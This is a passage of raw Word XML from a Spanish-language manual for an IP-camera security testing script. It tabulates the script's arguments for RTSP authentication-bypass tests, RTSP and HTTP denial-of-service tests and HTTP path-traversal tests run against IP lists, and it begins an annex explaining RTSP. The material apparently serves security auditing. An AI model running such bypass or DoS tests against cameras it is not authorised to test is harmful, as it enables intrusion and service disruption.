        <w:t>A continuación se procede a listar a modo de tabla el detalle de los argumentos permitidos para el lanzamiento del script:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D5716F" w:rsidRDefault="00D5716F" w:rsidP="00D5716F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Sombreadomediano1-nfasis2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="392" w:type="dxa"/>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ayout w:type="fixed"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1920"/>
        <w:gridCol w:w="3041"/>
        <w:gridCol w:w="2936"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D5716F">
        <w:trPr>
          <w:cnfStyle w:val="100000000000"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="1920" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D5716F" w:rsidRPr="00F66210" w:rsidRDefault="002D08CE" w:rsidP="005647FD">
            <w:pPr>
              <w:ind w:left="-250" w:firstLine="250"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Argumento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3041" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D5716F" w:rsidRPr="00F66210" w:rsidRDefault="00D5716F">
            <w:pPr>
              <w:cnfStyle w:val="100000000000"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F66210">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2936" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D5716F" w:rsidRPr="00F66210" w:rsidRDefault="002D08CE">
            <w:pPr>
              <w:cnfStyle w:val="100000000000"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Observaciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5716F">
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="1920" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D5716F" w:rsidRPr="00F66210" w:rsidRDefault="002D08CE">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-rAD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3041" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D5716F" w:rsidRPr="00F66210" w:rsidRDefault="002C54C6">
            <w:pPr>
              <w:cnfStyle w:val="000000100000"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Lanza la prueba de RTSP Authentication Bypass utlizando para ello el método DESCRIBE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2936" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D5716F" w:rsidRDefault="002C54C6">
            <w:pPr>
              <w:cnfStyle w:val="000000100000"/>
            </w:pPr>
            <w:r w:rsidRPr="009E653D">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Se lanzará la prueba por cada IP incluida en el fichero ipCams.txt</w:t>
            </w:r>
            <w:r w:rsidR="009E653D" w:rsidRPr="009E653D">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> y por cada URI incluida en el fichero rtspUris.txt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5716F">
        <w:trPr>
          <w:cnfStyle w:val="000000010000"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="1920" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D5716F" w:rsidRPr="00F66210" w:rsidRDefault="002D08CE">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-rAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3041" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D5716F" w:rsidRPr="00F66210" w:rsidRDefault="002C54C6" w:rsidP="002C54C6">
            <w:pPr>
              <w:cnfStyle w:val="000000010000"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Lanza la prueba de RTSP Authentication Bypass utlizando para ello el método SETUP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2936" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D5716F" w:rsidRPr="00F66210" w:rsidRDefault="009E653D">
            <w:pPr>
              <w:cnfStyle w:val="000000010000"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E653D">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Se lanzará la prueba por cada IP incluida en el fichero ipCams.txt y por cada URI incluida en el fichero rtspUris.txt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5716F">
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="1920" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D5716F" w:rsidRPr="00F66210" w:rsidRDefault="002D08CE">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-rAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3041" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D5716F" w:rsidRPr="00F66210" w:rsidRDefault="002C54C6" w:rsidP="002C54C6">
            <w:pPr>
              <w:cnfStyle w:val="000000100000"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Lanza la prueba de RTSP Authentication Bypass utlizando para ello el método PLAY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2936" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D5716F" w:rsidRDefault="009E653D">
            <w:pPr>
              <w:cnfStyle w:val="000000100000"/>
            </w:pPr>
            <w:r w:rsidRPr="009E653D">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Se lanzará la prueba por cada IP incluida en el fichero ipCams.txt y por cada URI incluida en el fichero rtspUris.txt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5716F">
        <w:trPr>
          <w:cnfStyle w:val="000000010000"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="1920" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D5716F" w:rsidRPr="00F66210" w:rsidRDefault="002D08CE">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-rAT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3041" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D5716F" w:rsidRPr="00F66210" w:rsidRDefault="002C54C6" w:rsidP="002C54C6">
            <w:pPr>
              <w:cnfStyle w:val="000000010000"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Lanza la prueba de RTSP Authentication Bypass utlizando para ello el método TEARDOWN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2936" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D5716F" w:rsidRPr="00F66210" w:rsidRDefault="009E653D">
            <w:pPr>
              <w:cnfStyle w:val="000000010000"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E653D">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Se lanzará la prueba por cada IP incluida en el fichero ipCams.txt y por cada URI incluida en el fichero rtspUris.txt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5716F">
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="1920" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D5716F" w:rsidRPr="00F66210" w:rsidRDefault="002D08CE">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-rA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3041" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002C54C6" w:rsidRDefault="002C54C6">
            <w:pPr>
              <w:cnfStyle w:val="000000100000"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Lanza todas las pruebas de RTSP Authentication Bypass. El resultado es el mismo que el de introducir: </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D5716F" w:rsidRPr="00F66210" w:rsidRDefault="002C54C6">
            <w:pPr>
              <w:cnfStyle w:val="000000100000"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-rAD –rAS – rAP -rAT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2936" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D5716F" w:rsidRPr="00F66210" w:rsidRDefault="009E653D" w:rsidP="009E653D">
            <w:pPr>
              <w:cnfStyle w:val="000000100000"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E653D">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Se lanzará </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>cada una de las pruebas</w:t>
            </w:r>
            <w:r w:rsidRPr="009E653D">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> por cada IP incluida en el fichero ipCams.txt y por cada URI incluida en el fichero rtspUris.txt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5716F">
        <w:trPr>
          <w:cnfStyle w:val="000000010000"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="1920" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D5716F" w:rsidRPr="00F66210" w:rsidRDefault="002D08CE">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-rD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3041" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D5716F" w:rsidRPr="00F66210" w:rsidRDefault="002C54C6" w:rsidP="00F66210">
            <w:pPr>
              <w:cnfStyle w:val="000000010000"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Lanza la prueba de Denial of Service introduciendo una cadena larga en la request de una petición RTSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2936" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D5716F" w:rsidRPr="00F66210" w:rsidRDefault="009E653D">
            <w:pPr>
              <w:cnfStyle w:val="000000010000"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E653D">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Se lanzará la prueba por cada IP incluida en el fichero ipCams.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5716F">
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="1920" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D5716F" w:rsidRDefault="002D08CE">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-rD2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3041" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D5716F" w:rsidRPr="00F66210" w:rsidRDefault="002C54C6" w:rsidP="002C54C6">
            <w:pPr>
              <w:cnfStyle w:val="000000100000"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Lanza la prueba de Denial of Service en RTSP a través del envío de una solicitud SETUP malformada</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2936" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D5716F" w:rsidRPr="00F66210" w:rsidRDefault="009E653D">
            <w:pPr>
              <w:cnfStyle w:val="000000100000"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E653D">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Se lanzará la prueba por cada IP incluida en el fichero ipCams.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D08CE">
        <w:trPr>
          <w:cnfStyle w:val="000000010000"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="1920" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002D08CE" w:rsidRDefault="002D08CE">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-hD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3041" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002D08CE" w:rsidRDefault="002C54C6" w:rsidP="002C54C6">
            <w:pPr>
              <w:cnfStyle w:val="000000010000"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Lanza la prueba de Denial of Service introduciendo una cadena larga en la request de una petición HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2936" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002D08CE" w:rsidRPr="00F66210" w:rsidRDefault="009E653D">
            <w:pPr>
              <w:cnfStyle w:val="000000010000"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E653D">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Se lanzará la prueba por cada IP incluida en el fichero ipCams.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D08CE">
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="1920" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002D08CE" w:rsidRDefault="002D08CE">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-hP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3041" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002D08CE" w:rsidRPr="002D08CE" w:rsidRDefault="002C54C6" w:rsidP="002C54C6">
            <w:pPr>
              <w:cnfStyle w:val="000000100000"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Lanza la prueba de Path Transversal a partir de una petición http.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2936" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002D08CE" w:rsidRPr="002D08CE" w:rsidRDefault="009E653D" w:rsidP="009E653D">
            <w:pPr>
              <w:cnfStyle w:val="000000100000"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E653D">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Se lanzará la prueba por cada IP incluida en el fichero ipCams.txt y por cada </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Path incluido en el fichero pathTransversal.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D5716F" w:rsidRPr="00F66210" w:rsidRDefault="00D5716F" w:rsidP="00D5716F">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D5716F" w:rsidRDefault="00D5716F" w:rsidP="00D5716F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0044601B" w:rsidRDefault="00413D0B" w:rsidP="00C84B17">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00C81553">
        <w:t xml:space="preserve">Anexo 1: </w:t>
      </w:r>
      <w:r w:rsidR="000335AC">
        <w:t>RTSP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0044601B" w:rsidRDefault="0044601B" w:rsidP="0044601B">
      <w:r w:rsidRPr="0044601B">
        <w:rPr>
          <w:i/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Fuente: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="006D44B3">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://profesores.elo.utfsm.cl/~agv/elo323/2s10/projects/ApablazaBustamante/desc.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C84B17" w:rsidRPr="0044601B" w:rsidRDefault="00C84B17" w:rsidP="0044601B"/>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>RTSP es un protocolo de capa de aplicación, no orientado a la conexión. En lugar de esto el servidor RTSP mantiene una sesión asociada a un identificador (Session ID).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>En la mayoría de los casos RTSP usa TCP para el envío de datos de control del reproductor (mensajes "out of band") y UDP para los datos de audio y vídeo (mensajes "in band"), aunque también puede usar TCP en caso de que se necesitara confiabilidad en el envío de paquetes, lo cual no es provisto por UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>El concepto de "in band" y "out of band" se refiere a que el protocolo es capaz de enviar distintos tipos de información por distintos puertos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>De forma intencionada, el protocolo es similar en sintaxis y operación a HTTP, por lo que los mecanismos de expansión añadidos a HTTP pueden, en muchos casos, añadirse a RTSP. Sin embargo, RTSP difiere de HTTP en un número significativo de aspectos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>- RTSP introduce nuevos métodos y tiene un identificador de protocolo diferente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>- Un servidor RTSP necesita mantener el estado de la conexión.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>- Tanto el servidor como el cliente pueden hacer solicitudes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>- Los datos son transportados por un protocolo diferente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>El protocolo soporta las siguientes operaciones:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
